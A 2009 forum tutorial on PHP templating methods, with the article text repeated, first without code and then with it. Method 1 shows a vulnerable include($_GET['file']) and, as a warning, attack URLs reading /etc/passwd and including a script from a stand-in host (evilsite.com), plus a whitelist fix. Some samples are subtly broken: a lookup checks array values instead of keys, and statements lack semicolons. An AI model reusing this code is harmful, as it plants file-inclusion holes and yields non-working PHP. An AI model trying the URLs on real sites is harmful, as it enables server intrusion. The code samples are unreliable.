Post by Jacob on Jun 12, 2009 14:31:29 GMT -5
Introduction to Templating with PHP
Templating is important to nearly every website now. It allows you to use the same
design on all your pages, while having different content. There are many ways of
doing it; this article will focus on the most common.
Method 1: File Inclusion
Read the paragraph below before using this code!
This is the most simple templating system. Pages are accessed by going to the
URL domain.com/index.php?file=aboutus.php, etc. However, you should
not use this code. Why? People could use a URL such as
domain.com/index.php?file=/etc/passwd or even
domain.com/index.php?file=http://evilsite.com/hackingtool.php, and
include any file they want from your server or elsewhere.
One way to prevent hacking with this method is to create a file list, and
prevent files other than those in the list from being accessed.
Method 2: Single File
In this method, all the pages are stored in one PHP file.
This can be easier to edit, because you only need to edit one file, but you also
have to remember to escape your quotes, e.g. don\'t, I\'ve, etc. as the pages
are stored as PHP strings.
Method 3: Content Management System
A content management system is a pre-made PHP script that makes it easy to setup
a website. You can usually download more templates, or make your own, although
it is usually more difficult than if you were making a template system from
scratch. These script also contain many features, called modules or plugins,
that allow you to add new stuff to your site--forum, poll, blog, directory,
store, etc. and you can also download more of these.
Method 4: Template File
Template files contain all the necessary information for a page's structure and layout,
and placeholders for the content. They need a method of storing the page data as
well. Here is an example of a template file:
In this example, the data files are stored in separate files, similar to method 1. However,
the files contain a PHP array rather than the page contents.
A PHP script ties it all together.
This method is the most flexible, as you can easily add new template variables (the text
in brackets in the above example). There are also PHP templating libraries available.
Templating is important to nearly every website now. It allows you to use the same
design on all your pages, while having different content. There are many ways of
doing it; this article will focus on the most common.
Method 1: File Inclusion
Read the paragraph below before using this code!
[header code]
<?php
include($_GET['file']);
?>
[footer code]
This is the most simple templating system. Pages are accessed by going to the
URL domain.com/index.php?file=aboutus.php, etc. However, you should
not use this code. Why? People could use a URL such as
domain.com/index.php?file=/etc/passwd or even
domain.com/index.php?file=http://evilsite.com/hackingtool.php, and
include any file they want from your server or elsewhere.
One way to prevent hacking with this method is to create a file list, and
prevent files other than those in the list from being accessed.
[header code]
<?php
$allowed = array('aboutus.php', 'products.php', 'home.php', 'contact.php');
if(in_array($_GET['file'], $allowed))
include($_GET['file']);
else
die('You are not allowed to access that file!')
?>
[footer code]
Method 2: Single File
In this method, all the pages are stored in one PHP file.
[header code]
<?php
$pages = array(
'aboutus' => '
Page contents 1
',
'products' => '
Page contents 2
',
'home' => '
Page contents 3
',
'contact' => '
Page contents 4
'
);
if(in_array($_GET['page'], $pages))
echo $pages[$_GET['page']];
else
echo 'The page you tried to access does not exist.';
?>
[footer code]
This can be easier to edit, because you only need to edit one file, but you also
have to remember to escape your quotes, e.g. don\'t, I\'ve, etc. as the pages
are stored as PHP strings.
Method 3: Content Management System
A content management system is a pre-made PHP script that makes it easy to setup
a website. You can usually download more templates, or make your own, although
it is usually more difficult than if you were making a template system from
scratch. These script also contain many features, called modules or plugins,
that allow you to add new stuff to your site--forum, poll, blog, directory,
store, etc. and you can also download more of these.
Method 4: Template File
Template files contain all the necessary information for a page's structure and layout,
and placeholders for the content. They need a method of storing the page data as
well. Here is an example of a template file:
<html>
<head>
<title>My Site - [pagetitle]</title>
<link rel="stylesheet" href="style.css"/>
</head>
<body>
<div id="pagetitle">[pagetitle]</div>
[pagecontent]
</body>
</html>
In this example, the data files are stored in separate files, similar to method 1. However,
the files contain a PHP array rather than the page contents.
<?php
$page = array(
'title' => 'About Us',
'content' => 'This is our about us page!'
);
?>
A PHP script ties it all together.
<?php
$allowed = array('aboutus', 'products', 'home', 'contact');
if(in_array($_GET['file'], $allowed))
include($_GET['file'].'.php');
else
die('You are not allowed to access that file!')
$template = file_get_contents('template.html');
$replace = array('[pagetitle]', '[pagecontent]');
$replacements = array($page['title'], $page['content']);
$template = str_replace($replace, $replacements, $template)
echo $template;
?>
This method is the most flexible, as you can easily add new template variables (the text
in brackets in the above example). There are also PHP templating libraries available.